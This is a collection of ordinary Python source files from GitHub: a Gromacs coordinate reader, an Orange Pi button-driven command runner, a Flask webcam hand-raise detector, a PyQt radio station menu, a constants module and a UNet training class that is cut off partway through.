+{"seq_id":"33399767036","text":"import sys\n\nfrom pCore import logFile , \\\n LogFileActive , \\\n TextFileReader\nfrom pScientific.Geometry3 import Coordinates3\nfrom pScientific.Symmetry import SymmetryParameters\nfrom .ExportImport import _Importer\n\n#===================================================================================================================================\n# . Class.\n#===================================================================================================================================\nclass GromacsCrdFileReader ( TextFileReader ):\n \"\"\"Class for reading Gromacs .gro coordinate files.\"\"\"\n\n _classLabel = \"Gromacs Crd File Reader\"\n\n def GetAtomLineFormat ( self ):\n \"\"\"Get the format of the atom lines.\n\n This is:\n RESNO RES TYPE ATOMNO X Y Z \n I5 A4 2X A4 I5 F8.3 F8.3 F8.3 \n \"\"\"\n a = 4 ; f = 8 ; i = 5 ; x = 2\n p = 0\n format = [ ( p, p+i, int , 0 ) ] ; p += i # . Res. number.\n format.append ( ( p, p+a, None , \"\" ) ) ; p += (a+x) # . Res. name.\n format.append ( ( p, p+a, None , \"\" ) ) ; p += (a+i) # . Atom name.\n format.append ( ( p, p+f, float, 0.0 ) ) ; p += f # . X.\n format.append ( ( p, p+f, float, 0.0 ) ) ; p += f # . Y.\n format.append ( ( p, p+f, float, 0.0 ) ) # . Z.\n return format\n\n def Parse ( self, log = logFile ):\n \"\"\"Parsing.\"\"\"\n if not self.isParsed:\n # . Initialization.\n if LogFileActive ( log ): self.log = log\n # . Get the atom line format.\n atomlineformat = self.GetAtomLineFormat ( )\n # . Open the file.\n self.Open ( )\n # . Parse all the lines.\n try:\n # . Keyword line.\n self.title = self.GetLine ( )\n # . Number of atoms.\n items = self.GetTokens ( converters = ( int, ) )\n natoms = items[0]\n # . The coordinate data.\n self.xyz = Coordinates3.WithExtent ( natoms )\n for n in range ( natoms ):\n tokens = self.GetFixedFormatTokens ( *atomlineformat )\n for i in range ( 3 ): self.xyz[n,i] = float ( tokens[i+3]*10.0 )\n # . Symmetry data.\n self.symmetryItems = self.GetTokens ( )\n except EOFError:\n pass\n # . Close the file.\n self.WarningStop ( )\n self.Close ( )\n # . Set the parsed flag and some other options.\n self.log = None\n self.isParsed = True\n\n @classmethod\n def PathToCoordinates3 ( selfClass, path, log = logFile ):\n \"\"\"Return the coordinates from a file.\"\"\"\n inFile = selfClass.FromPath ( path )\n inFile.Parse ( log = log )\n inFile.Summary ( log = log )\n return inFile.ToCoordinates3 ( )\n\n @classmethod\n def PathToSymmetryParameters ( selfClass, path, log = logFile ):\n \"\"\"Return the symmetry paramters from a file.\"\"\"\n inFile = selfClass.FromPath ( path )\n inFile.Parse ( log = log )\n inFile.Summary ( log = log )\n return inFile.ToSymmetryParameters ( )\n\n def SummaryItems ( self ):\n \"\"\"Summary items.\"\"\"\n items = []\n if self.isParsed:\n items.append ( ( \"Atom Lines\", \"{:d}\".format ( self.xyz.rows ) ) )\n return items\n\n def ToCoordinates3 ( self ):\n \"\"\"Return the coordinates.\"\"\"\n if self.isParsed: return self.xyz\n else: return None\n\n def ToSymmetryParameters ( self ):\n \"\"\"Return the symmetry parameters.\"\"\"\n # . Will assign only cubic, orthorhombic, dodecahedron or octahedron boxes. \n # . Will fail for general triclinic, but this could be hard-coded once sizes/angles are known.\n if self.isParsed: \n # . triclinic box\n items = self.symmetryItems\n if len ( items ) == 9: \n specialTriclinic = items[8] == items[7] or \"-\" + items[7] == items[5]\n if not specialTriclinic: self.Warning ( \"Invalid general triclinic box symmetry.\", True )\n # . Dodecahedron \n if items[0] == items[1]:\n alpha = 60.0\n beta = 60.0\n gamma = 90.0\n # . Octahedron\n else: \n alpha = 70.53\n beta = 109.47\n gamma = 70.53\n a = float ( items[0] ) * 10.0\n b = a\n c = a\n # . Cubic or orthorhombic box\n elif len ( items ) == 3 :\n alpha = 90.0\n beta = 90.0\n gamma = 90.0\n items = [ float ( items[i] ) * 10.0 for i in range(3) ]\n a = items[0]\n b = items[1]\n c = items[2]\n else: self.Warning ( \"Invalid or unrecognized box symmetry.\", True )\n self.symmetryParameters = SymmetryParameters ( )\n self.symmetryParameters.SetCrystalParameters ( a = a, b = b, c = c, alpha = alpha, beta = beta, gamma = gamma )\n return self.symmetryParameters\n else: return None\n\n#===================================================================================================================================\n# . Importer definitions.\n#===================================================================================================================================\n_Importer.AddHandler ( { Coordinates3 : GromacsCrdFileReader.PathToCoordinates3 } , [ \"gro\", \"GRO\" ], \"Gromacs Coordinates\" )\n\n#===================================================================================================================================\n# . Testing.\n#===================================================================================================================================\nif __name__ == \"__main__\":\n pass\n\n","repo_name":"pdynamo/pDynamo3","sub_path":"pBabel/GromacsCrdFileReader.py","file_name":"GromacsCrdFileReader.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"71599734801","text":"#!/usr/bin/env python3\n\"\"\"This script lets you easily give commands to an orange pi by pressing the\nboard button. The commands you can give are easily configured in the \ncommands.txt file. The first line is the first command, the second line is the \nsecond command and so on.\nYou select the command by pressing the button for a certain amount of seconds.\nThe red led serves as an indicator of the time the button has been pressed and\nthus, the command selected so far.\nIf you press the button for less than one second, no command is executed. The \nled turns on while you press it to let you know the program is running.\nIf you press the button for more than a second the led will flicker each second\nto let you know which command are you giving:\n one flicker, command one\n two flickers, command two\n ... and so on\nAfter a command is given the red led will flash n times to confirm it's \nexecuting command n.\n\"\"\"\nimport time, os, sys, subprocess\n\nimport opibtn, opiled\n\nif not os.geteuid() == 0:\n sys.exit(\"Only root can run this script\")\n\n_start = None\n\n\ndef _down():\n global _start\n _start = time.time()\n opiled.blink(\"red\", [0.95, 0.05])\n\n\ndef _up():\n if not _start:\n return # No previous Down event\n pressed = time.time() - _start\n opiled.set_state(\"red\", 0)\n command = int(pressed // 1)\n print(f\"pressed for: {pressed:.2f}s command: {command}\")\n time.sleep(1)\n if command:\n # Confirm the command to execute\n opiled.blink(\"red\", [0.5, 0.5], command)\n time.sleep(command)\n with open(\"commands.txt\", \"r\") as coms:\n for num, line in enumerate(coms):\n if num == command - 1:\n print(f'executing command {command}: \"{line.strip()}\"')\n subprocess.run([line], shell=True)\n\nif __name__ == \"__main__\":\n try:\n opibtn.read_button(_down, _up)\n except KeyboardInterrupt:\n pass\n","repo_name":"diegorodriguezv/button_commands","sub_path":"button_commands.py","file_name":"button_commands.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3062751257","text":"import sys\nimport cntk\nimport cv2\nimport numpy as np\nfrom PIL import Image\nfrom flask import Flask\nfrom threading import Thread\n\napp = Flask(__name__)\n\n# define the model and label files\nMODEL_FILENAME = '../model.onnx'\nLABELS_FILENAME = '../labels.txt'\n\n# define global variables\nglobal cap\nglobal model\nglobal od_model\nglobal hand_x, hand_y\nglobal frame\nglobal predictions\n\n# define flask app call\n@app.route('/')\ndef get_raise():\n # define global frame\n global frame\n condition = False\n listOfHighest = []\n frameCounter = 0\n while frameCounter < 5:\n\n ret, frame = cap.read()\n\n predictionThreshold = 45\n image = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n predictions = od_model.predict_image(image)\n highest = 0\n if (len(predictions) > 0):\n for a in range(len(predictions)):\n if predictions[a].get('probability') > highest:\n highest = predictions[a].get('probability') * 100\n if (len(listOfHighest) >= 5):\n del (listOfHighest[0])\n listOfHighest.append(highest)\n else:\n listOfHighest.append(highest)\n frameCounter+=1\n averageHighestPrediction = (sum(listOfHighest)) / len(listOfHighest)\n\n print(\"Current average: \", averageHighestPrediction)\n\n print(predictions)\n endResult = \"0\"\n print(averageHighestPrediction, predictionThreshold)\n if float(averageHighestPrediction) > float(predictionThreshold):\n endResult = \"1\"\n print(endResult)\n return endResult\n else:\n endResult = \"0\"\n print(endResult)\n return endResult\n\n@app.route('/deep')\ndef get_raiseFull():\n global frame\n condition = False\n listOfHighest = []\n frameCounter = 0\n\n while frameCounter < 3:\n\n ret, frame = cap.read()\n\n predictionThreshold = 30\n image = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n predictionsMain = od_model.predict_image(image)\n highest = 0\n if (len(predictionsMain) > 0):\n for a in range(len(predictionsMain)):\n if predictionsMain[a].get('probability') > highest:\n highest = predictionsMain[a].get('probability') * 100\n if (len(listOfHighest) >= 5):\n del (listOfHighest[0])\n listOfHighest.append(highest)\n else:\n listOfHighest.append(highest)\n frameCounter+=1\n\n # calculate the highest prediction (average across frames)\n averageHighestPrediction = (sum(listOfHighest)) / len(listOfHighest)\n\n # print out calculated data\n print(\"Current average: \", averageHighestPrediction)\n print(predictionsMain)\n print(averageHighestPrediction, predictionThreshold)\n\n # if the average high prediction is higher/lower than our defined threshold,\n # return an indication to the mobile phone\n if float(averageHighestPrediction) > float(predictionThreshold):\n # REST backend input\n endResult = str(predictionsMain)\n print(endResult)\n return endResult\n else:\n # REST backend input\n endResult ='0'\n print(endResult)\n return endResult\n\nclass ObjectDetection(object):\n \"\"\"Class for Custom Vision's exported object detection model\n \"\"\"\n\n ANCHORS = np.array([[0.573, 0.677], [1.87, 2.06], [3.34, 5.47], [7.88, 3.53], [9.77, 9.17]])\n IOU_THRESHOLD = 0.45\n\n def __init__(self, labels, prob_threshold=0.10, max_detections=20):\n \"\"\"Initialize the class\n\n Args:\n labels ([str]): list of labels for the exported model.\n prob_threshold (float): threshold for class probability.\n max_detections (int): the max number of output results.\n \"\"\"\n\n assert len(labels) >= 1, \"At least 1 label is required\"\n\n self.labels = labels\n self.prob_threshold = prob_threshold\n self.max_detections = max_detections\n\n def _logistic(self, x):\n return np.where(x > 0, 1 / (1 + np.exp(-x)), np.exp(x) / (1 + np.exp(x)))\n\n # image compression function\n def _non_maximum_suppression(self, boxes, class_probs, max_detections):\n \"\"\"Remove overlapping bouding boxes\n \"\"\"\n assert len(boxes) == len(class_probs)\n\n max_detections = min(max_detections, len(boxes))\n max_probs = np.amax(class_probs, axis=1)\n max_classes = np.argmax(class_probs, axis=1)\n\n areas = boxes[:, 2] * boxes[:, 3]\n\n selected_boxes = []\n selected_classes = []\n selected_probs = []\n\n while len(selected_boxes) < max_detections:\n # Select the prediction with the highest probability.\n i = np.argmax(max_probs)\n if max_probs[i ] < self.prob_threshold:\n break\n\n # Save the selected prediction\n selected_boxes.append(boxes[i])\n selected_classes.append(max_classes[i])\n selected_probs.append(max_probs[i])\n\n box = boxes[i]\n other_indices = np.concatenate((np.arange(i), np.arange(i + 1, len(boxes))))\n other_boxes = boxes[other_indices]\n\n # Get overlap between the 'box' and 'other_boxes'\n x1 = np.maximum(box[0], other_boxes[:, 0])\n y1 = np.maximum(box[1], other_boxes[:, 1])\n x2 = np.minimum(box[0] + box[2], other_boxes[:, 0] + other_boxes[:, 2])\n y2 = np.minimum(box[1] + box[3], other_boxes[:, 1] + other_boxes[:, 3])\n w = np.maximum(0, x2 - x1)\n h = np.maximum(0, y2 - y1)\n\n # Calculate Intersection Over Union (IOU)\n overlap_area = w * h\n iou = overlap_area / (areas[i] + areas[other_indices] - overlap_area)\n\n # Find the overlapping predictions\n overlapping_indices = other_indices[np.where(iou > self.IOU_THRESHOLD)[0]]\n overlapping_indices = np.append(overlapping_indices, i)\n\n # Set the probability of overlapping predictions to zero, and udpate max_probs and max_classes.\n class_probs[overlapping_indices, max_classes[i]] = 0\n max_probs[overlapping_indices] = np.amax(class_probs[overlapping_indices], axis=1)\n max_classes[overlapping_indices] = np.argmax(class_probs[overlapping_indices], axis=1)\n\n assert len(selected_boxes) == len(selected_classes) and len(selected_boxes) == len(selected_probs)\n return selected_boxes, selected_classes, selected_probs\n\n def _extract_bb(self, prediction_output, anchors):\n assert len(prediction_output.shape) == 3\n num_anchor = anchors.shape[0]\n height, width, channels = prediction_output.shape\n assert channels % num_anchor == 0\n\n num_class = int(channels / num_anchor) - 5\n assert num_class == len(self.labels)\n\n outputs = prediction_output.reshape((height, width, num_anchor, -1))\n\n # Extract bouding box information\n x = (self._logistic(outputs[..., 0]) + np.arange(width)[np.newaxis, :, np.newaxis]) / width\n y = (self._logistic(outputs[..., 1]) + np.arange(height)[:, np.newaxis, np.newaxis]) / height\n w = np.exp(outputs[..., 2]) * anchors[:, 0][np.newaxis, np.newaxis, :] / width\n h = np.exp(outputs[..., 3]) * anchors[:, 1][np.newaxis, np.newaxis, :] / height\n\n # (x,y) in the network outputs is the center of the bounding box. Convert them to top-left.\n x = x - w / 2\n y = y - h / 2\n boxes = np.stack((x, y, w, h), axis=-1).reshape(-1, 4)\n\n # Get confidence for the bounding boxes.\n objectness = self._logistic(outputs[..., 4])\n\n # Get class probabilities for the bounding boxes.\n class_probs = outputs[..., 5:]\n class_probs = np.exp(class_probs - np.amax(class_probs, axis=3)[..., np.newaxis])\n class_probs = class_probs / np.sum(class_probs, axis=3)[..., np.newaxis] * objectness[..., np.newaxis]\n class_probs = class_probs.reshape(-1, num_class)\n\n assert len(boxes) == len(class_probs)\n return (boxes, class_probs)\n\n def predict_image(self, image):\n inputs = self.preprocess(image)\n prediction_outputs = self.predict(inputs)\n return self.postprocess(prediction_outputs)\n\n def preprocess(self, image):\n image = image.convert(\"RGB\") if image.mode != \"RGB\" else image\n image = image.resize((416, 416))\n return image\n\n def predict(self, preprocessed_inputs):\n \"\"\"Evaluate the model and get the output\n\n Need to be implemented for each platforms. i.e. TensorFlow, CoreML, etc.\n \"\"\"\n raise NotImplementedError\n\n def postprocess(self, prediction_outputs):\n \"\"\" Extract bounding boxes from the model outputs.\n\n Args:\n prediction_outputs: Output from the object detection model. (H x W x C)\n\n Returns:\n List of Prediction objects.\n \"\"\"\n boxes, class_probs = self._extract_bb(prediction_outputs, self.ANCHORS)\n\n # Remove bounding boxes whose confidence is lower than the threshold.\n max_probs = np.amax(class_probs, axis=1)\n index, = np.where(max_probs > self.prob_threshold)\n index = index[(-max_probs[index]).argsort()]\n\n # Remove overlapping bounding boxes\n selected_boxes, selected_classes, selected_probs = self._non_maximum_suppression(boxes[index],\n class_probs[index],\n self.max_detections)\n\n return [{'probability': round(float(selected_probs[i]), 8),\n 'tagId': int(selected_classes[i]),\n 'tagName': self.labels[selected_classes[i]],\n 'boundingBox': {\n 'left': round(float(selected_boxes[i][0]), 8),\n 'top': round(float(selected_boxes[i][1]), 8),\n 'width': round(float(selected_boxes[i][2]), 8),\n 'height': round(float(selected_boxes[i][3]), 8)\n }\n } for i in range(len(selected_boxes))]\n\n# Detect objects using CNTK\nclass CNTKObjectDetection(ObjectDetection):\n \"\"\"Object Detection class for CNTK\n \"\"\"\n def __init__(self, model, labels):\n super(CNTKObjectDetection, self).__init__(labels)\n self.model = model\n \n def predict(self, preprocessed_image):\n inputs = np.array(preprocessed_image, dtype=np.float32)[:,:,(2,1,0)] # RGB -> BGR\n inputs = np.ascontiguousarray(np.rollaxis(inputs, 2))\n\n outputs = self.model.eval({self.model.arguments[0]: [inputs]})\n return np.squeeze(outputs).transpose((1,2,0))\n\n\ndef main():\n # globalize variables\n global cap, model, od_model, frame\n # open the main video capture\n cap = cv2.VideoCapture(0)\n # read in the first frame of video\n ret, frame = cap.read()\n # define the neural network's trained model, load it in\n model = cntk.Function.load(MODEL_FILENAME, format=cntk.ModelFormat.ONNX)\n\n # Load labels\n with open(LABELS_FILENAME, 'r') as f:\n labels = [l.strip() for l in f.readlines()]\n\n od_model = CNTKObjectDetection(model, labels)\n\n# show the image to the user\ndef showImage():\n # define the globals\n global od_model, cap, frame, predictions\n\n # loop until program ends\n while True:\n\n # read in the image, frame by frame\n ret, myframe = cap.read()\n # display the image\n cv2.imshow(\"Frame\",myframe)\n # given an \"x\" input, end the program.\n givenKey = cv2.waitKey(50) # every one millisecond\n # program end clause\n if givenKey == ord('x'):\n cap.release()\n cv2.destroyAllWindows()\n sys.exit()\n# run the Flask server\ndef runApp():\n print(\"Server initiated!\")\n app.run(host='0.0.0.0',port=5000)\n\n# This is called immediately as the program starts\nif __name__ == '__main__':\n # initialize predictions\n predictions = []\n # run main() for further initialization\n main()\n # define and run the different threads for efficiency\n appThread = Thread(target=runApp)\n appThread.start()\n imageThread = Thread(target=showImage)\n imageThread.start()\n\n\n\n\n","repo_name":"SmitRao/UofT-Hacks-2019","sub_path":"handRecognition/python/ctnk2.py","file_name":"ctnk2.py","file_ext":"py","file_size_in_byte":12275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29388463157","text":"from PyQt5 import QtGui\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QDialog\nfrom PyQt5.QtGui import QIcon, QPixmap\n\nimport labelClickable\nimport stationDialog\nimport selectmenu\nimport json\nimport tunein\nimport urllib\nimport soma\nimport plparser\nimport platform\n\nselectXpos = 250\nnormalcolor = \"#b1b1b1\"\nhighlight = \"White\" \n\nclass SelectStation(QDialog):\n def __init__(self):\n super().__init__()\n self.menuActive = None\n self.selectStation = stationDialog.Ui_SelectDialog()\n self.selectStation.setupUi(self)\n self.setStyleSheet(\"QWidget#SelectDialog {background-image: url(Music-Record-Vinyl-800-480.jpg);}\")\n self.createLabel(15, 15, normalcolor, \"Back\", self.backButton_clicked)\n self.fav_label = self.createLabel(15, 65, highlight, \"Favorites\", self.favorites_clicked)\n self.pinguin_label = self.createLabel(15, 115, normalcolor, \"Pinguin\", self.pinguin_clicked)\n self.tuneIn_label = self.createLabel(15, 165, normalcolor,\"TuneIn\", self.tuneIn_clicked)\n self.somafm_label = self.createLabel(15, 215, normalcolor,\"SomaFm\", self.somafm_clicked)\n self.readFavorites()\n self.readPinguin()\n self.items = self.favorites\n self.tuneIn = tunein.openRadio()\n self.sMenu = selectmenu.selectMenu(self, self.items, 6, selectXpos, self.itemSelected)\n self.menu = \"Favorites\" \n self.playing_name = \"\"\n self.playing_url = \"\"\n self.playing_image = \"\"\n \n \n self.pow_button = self.createIconLabel(20, 415, normalcolor, \"\", self.powerButton_clicked)\n pixmap = QtGui.QPixmap(\"./artwork/power-48-48.png\")\n #self.pow_button.resize(50, 50)\n self.pow_button.setPixmap(pixmap.scaled(self.pow_button.size(), QtCore.Qt.IgnoreAspectRatio))\n \n self.favmin_button = self.createIconLabel(85, 414, normalcolor, \"\", self.deleteFavorite_clicked)\n pixmap = QtGui.QPixmap(\"./artwork/favorite-48-48_min.png\")\n #self.set_button.resize(50, 50)\n self.favmin_button.setPixmap(pixmap.scaled(self.favmin_button.size(), QtCore.Qt.IgnoreAspectRatio))\n \n self.favplus_button = self.createIconLabel(150, 414, normalcolor, \"\", self. addFavorite_clicked)\n pixmap = QtGui.QPixmap(\"./artwork/favorite-48-48_plus.png\")\n #self.fav_button.resize(50, 50)\n self.favplus_button.setPixmap(pixmap.scaled(self.favplus_button.size(), QtCore.Qt.IgnoreAspectRatio))\n \n \n def powerButton_clicked(self):\n self.radio.showClock()\n \n \n def readFavorites(self):\n try:\n with open(\"favorites.json\") as json_data:\n self.favorites = json.load(json_data)\n except Exception as msg:\n print(\"file problem:\" + str(msg))\n return \n\n def readPinguin(self):\n try:\n with open(\"pinguin.json\") as json_data:\n self.pinguin = json.load(json_data)\n except Exception as msg:\n print(\"file problem:\" + str(msg))\n return \n\n\n def writeFavorites(self):\n try:\n with open(\"favorites.json\", \"w\") as json_data:\n json.dump(self.favorites, json_data, indent=4)\n except Exception as msg:\n print(\"file problem:\" + str(msg))\n return \n\n\n def show(self):\n self.favorites_clicked()\n self.menuActive = \"left\"\n super().show()\n\n \n def itemSelected(self, item):\n if self.items[item].get(\"type\") == \"audio\":\n print(\"Item selected: \" + str(item))\n if self.menu == \"tuneIn\":\n url = self.tuneIn.getStreamUrl(self.items[item].get(\"url\")).splitlines()[0]\n else:\n url = self.items[item].get(\"url\")\n if (\".pls\" in url) or (\".m3u\" in url):\n try:\n req = urllib.request.urlopen(url)\n file = req.read()\n url = plparser.parse(filename=url, filedata=file).Tracks[0].File\n except Exception as msg:\n print(msg) \n self.playing_name = self.items[item].get(\"name\") \n self.playing_url = url\n self.playing_image = self.items[item].get(\"image\")\n if self.playing_image != None:\n self.radio.showPicture(self.playing_image)\n self.radio.playNew(url,self.playing_name)\n self.radio.showArtist(\"\")\n self.radio.showSong(\"\")\n self.radio.show() \n self.hide()\n else:\n self.items = self.tuneIn.getNextLayer(self.items[item].get(\"url\"))\n self.sMenu.setItems(self.items)\n if self.menuActive == \"right\":\n self.sMenu.highlight(0)\n \n \n \n def createLabel(self, x, y, color, text, connect):\n font = QtGui.QFont()\n font.setFamily(\"Droid Sans\")\n font.setPointSize(30)\n font.setBold(True)\n font.setWeight(75)\n label_hdl = labelClickable.QLabelClickable(self)\n label_hdl.setFont(font)\n label_hdl.setGeometry(x, y, 300, 50)\n label_hdl.setText(\"\"+text+\"\")\n if connect != None:\n label_hdl.clicked.connect(connect)\n return label_hdl \n \n def createIconLabel(self, x, y, color, text, connect):\n font = QtGui.QFont()\n font.setFamily(\"Droid Sans\")\n font.setPointSize(30)\n font.setBold(True)\n font.setWeight(75)\n label_hdl = labelClickable.QLabelClickable(self)\n label_hdl.setFont(font)\n label_hdl.setGeometry(x, y, 48, 48)\n label_hdl.setText(\"\"+text+\"\")\n if connect != None:\n label_hdl.clicked.connect(connect)\n return label_hdl \n \n \n \n def changeLabel(self, handle, color, text):\n handle.setText(\"\"+text+\"\")\n \n \n def showSelectStation(self, radio):\n self.items = self.favorites\n self.radio = radio\n self.sMenu.setItems(self.items)\n self.show()\n \n \n def hideSelectStation(self):\n self.menuActive = None\n #self.radio.show()\n self.hide()\n \n\n def backButton_clicked(self):\n self.menuActive = None\n self.radio.show()\n self.hide() \n\n\n def favorites_clicked(self):\n self.changeLabel(self.fav_label, highlight, \"Favorites\")\n self.changeLabel(self.pinguin_label, normalcolor, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, normalcolor, \"TuneIn\") \n self.changeLabel(self.somafm_label, normalcolor, \"SomaFm\") \n self.items = self.favorites\n self.menu = \"Favorites\"\n self.sMenu.setItems(self.items)\n \n \n def pinguin_clicked(self):\n self.changeLabel(self.fav_label, normalcolor, \"Favorites\")\n self.changeLabel(self.pinguin_label, highlight, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, normalcolor, \"TuneIn\") \n self.changeLabel(self.somafm_label, normalcolor, \"SomaFm\") \n self.items = self.pinguin\n self.menu = \"Pinguin\"\n self.sMenu.setItems(self.items)\n \n \n \n def tuneIn_clicked(self):\n self.changeLabel(self.fav_label, normalcolor, \"Favorites\") \n self.changeLabel(self.pinguin_label, normalcolor, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, highlight, \"TuneIn\") \n self.changeLabel(self.somafm_label, normalcolor, \"SomaFm\") \n self.items = self.tuneIn.getOverview()\n self.menu = \"tuneIn\"\n self.sMenu.setItems(self.items)\n \n \n def somafm_clicked(self):\n self.changeLabel(self.fav_label, normalcolor, \"Favorites\") \n self.changeLabel(self.pinguin_label, normalcolor, \"Pinguin\")\n self.changeLabel(self.tuneIn_label, normalcolor, \"TuneIn\") \n self.changeLabel(self.somafm_label, highlight, \"SomaFm\")\n self.items = soma.get_stations()\n self.menu = \"Somafm\"\n self.sMenu.setItems(self.items)\n \n def addFavorite_clicked(self):\n for item in self.favorites:\n if (item.get(\"url\") == self.playing_url) or (self.playing_url == \"\"):\n return #already i playlist\n \n self.favorites.append({\"name\":self.playing_name, \n \"url\":self.playing_url,\n \"image\":self.playing_image,\n \"type\": \"audio\" }) \n self.writeFavorites()\n self.radio.show()\n self.hide() \n \n \n def deleteFavorite_clicked(self):\n for index in range(0, len(self.favorites)):\n item = self.favorites[index]\n if item.get(\"url\") == self.playing_url:\n self.favorites.pop(index)\n self.writeFavorites()\n self.radio.show()\n self.hide() \n \n \n def remoteCommand(self, command):\n # send command to selectmenu\n self.sMenu.remoteCommand(command)\n \n # handle commands if this menu is active\n if (self.menuActive != None):\n if command == \"power\":\n self.radio.showClock()\n elif command == \"down\":\n self.remoteDown()\n elif command == \"up\":\n self.remoteUp()\n elif (command == \"ok\") or (command == \"right\"):\n self.remoteOK()\n elif (command == \"back\") or (command == \"left\"):\n self.menuActive = None\n self.radio.show()\n self.hide() \n \n \n def remoteDown(self):\n if self.menuActive == \"left\":\n if self.menu == \"Favorites\":\n self.pinguin_clicked()\n elif self.menu == \"Pinguin\":\n self.tuneIn_clicked() \n elif self.menu == \"tuneIn\": \n self.somafm_clicked()\n \n \n def remoteUp(self):\n if self.menuActive == \"left\":\n if self.menu == \"Pinguin\":\n self.favorites_clicked() \n elif self.menu == \"tuneIn\": \n self.pinguin_clicked()\n elif self.menu == \"Somafm\":\n self.tuneIn_clicked() \n \n \n def remoteOK(self):\n if self.menuActive == \"left\":\n self.menuActive = \"right\"\n self.sMenu.highlight(0)\n elif self.menuActive == \"right\":\n self.itemSelected(self.sMenu.getCurrentItem())\n \n \n \n \n \n","repo_name":"pruimpit/PyQtRadio","sub_path":"station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":10591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3511357101","text":"INVALID \t\t\t\t= 6\n\nINTERIOR \t\t\t\t= 7\nBOUNDARY \t\t\t\t= 8\n\nSAME_OBJECT \t\t\t= 9\nOTHER_OBJECT \t\t\t= 10\nNO_OBJECT \t\t\t\t= 11\n\nRUBBERBAND_SELECTION \t= 12\nVALID \t\t\t\t\t= 13\n\nITEM \t\t\t\t\t= 0\nCONNECTOR\t\t\t\t= 1\nCONNECTION\t\t\t\t= 2\nEMPTY\t\t\t\t\t= 3\n\nCOMPARTMENT \t\t\t= 14\nCOMPARTMENT_BOUNDARY \t= 4\nCOMPARTMENT_INTERIOR \t= 5\n\nGROUP\t\t\t\t\t= 15\nGROUP_BOUNDARY \t\t\t= 16\nGROUP_INTERIOR \t\t= 17\n","repo_name":"BhallaLab/moose","sub_path":"moose-gui/plugins/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"}
+{"seq_id":"73157901521","text":"from __init__ import *\nimport unet_model\nimport dataset\nimport torch.nn as nn\nfrom skimage import measure\nimport datetime\nimport csv\n\n# 每一类对于loss的weight\nloss_weight = np.array([0.2, 0.2, 0.2, 0.2, 0.2])\n\n\n\n\nclass Trainer():\n def __init__(self, dir_dict, args):\n self.args=args\n self.augment = args['augment']\n self.train_ratio = float(args['train_ratio'])\n self.shuffle = args['shuffle']\n self.n_classes = int(args['n_classes'])\n self.n_channels = int(args['in_channels'])\n self.learning_rate = float(args['learning_rate'])\n self.epochs = int(args['epochs'])\n self.momentum_factor = float(args['momentum_factor'])\n self.weight_decay = float(args['weight_decay'])\n self.grid_clip_by_value = float(args['grad_clip_by_value'])\n self.save = args['save']\n self.save_freq = int(args['save_freq'])\n self.confidence_threshold = float(args['confidence_threshold'])\n self.lr_decay_step = int(args['lr_decay_step'])\n self.dir_dict = dir_dict\n # to GPU\n self.cuda_gpu = torch.cuda.is_available()\n # load dataset\n self.bulid_dataset()\n # build model\n if self.cuda_gpu:\n self.model = unet_model.UNet(self.n_channels, self.n_classes).cuda()\n else:\n self.model = unet_model.UNet(self.n_channels, self.n_classes)\n # build optimizer\n self.build_optimiezer()\n\n\n\n\n def bulid_dataset(self):\n self.train_dataloader = dataset.get_train_dataloaders(self.dir_dict['train_image_dir'],self.dir_dict['train_box_dir'],batch_size= int(self.args['batch_size']), augment=self.augment, shuffle=self.shuffle, train_size=self.train_ratio)\n self.val_dataloader = dataset.get_Val_dataloaders(self.dir_dict['train_image_dir'],self.dir_dict['train_box_dir'],batch_size= int(self.args['batch_size']), shuffle=self.shuffle, train_size=self.train_ratio)\n\n def loss(self, output, label):\n if self.cuda_gpu:\n loss_function = nn.CrossEntropyLoss(weight=torch.tensor(loss_weight).float().cuda())\n else:\n loss_function = nn.CrossEntropyLoss(weight=torch.tensor(loss_weight).float())\n\n # output:(B,n,H,W) to (B,H,W,n)\n # label:(B,H,W) [0,3]\n # label 对应 output的通道 0->通道0 1->通道1 2->通道2 3->通道3\n # output 的通道0表示label=0的概率分布\n loss = loss_function(output, label)\n return loss\n\n\n def build_optimiezer(self):\n model = self.model\n parameters = model.parameters()\n self.optimizer = torch.optim.SGD(parameters, lr=self.learning_rate, momentum=self.momentum_factor, weight_decay=self.weight_decay)\n\n def train(self):\n self.model = self.model\n self.model.train()\n Map_result_file = self.dir_dict['result_dir'] + '/'+datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + '.csv'\n with open(Map_result_file,'w') as Map_result_file:\n Map_writer = csv.writer(Map_result_file)\n # Map_header = ['epoch','train_Map','train_loss','val_Map','val_loss']\n Map_header = ['epoch','train_loss','val_loss']\n Map_writer.writerow(Map_header)\n\n for i in range(1, self.epochs + 1):\\\n\n print('train epoch',i)\n train_csv_path, train_loss = self.train_epoch(i)\n print('epoch'+str(i)+'train'+str(train_loss))\n\n self.save_checkpoints(epoch=i)\n #train_Map = Map_metric.Map_eval(self.dir_dict['train_box_dir'],train_csv_path,self.n_classes)\n print('validate epoch',i)\n val_csv_path, val_loss=self.validate_epoch(i)\n print('epoch' + str(i) + 'validata' + str(val_loss))\n #val_Map = Map_metric.Map_eval(self.dir_dict['train_box_dir'],val_csv_path,self.n_classes)\n # write the train map and validate map to csv file\n Map_writer.writerow([i,train_loss,val_loss])\n\n\n def train_epoch(self,epoch):\n model, train_loader, optimizer = self.model, self.train_dataloader, self.optimizer\n model.train()\n losses = AverageMeter()\n self.adjust_learning_rate(epoch)\n csv_file_path = self.dir_dict['csv_dir'] + '/'+datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + '_train_' + str(\"%06d\" % epoch ) + '.csv'\n 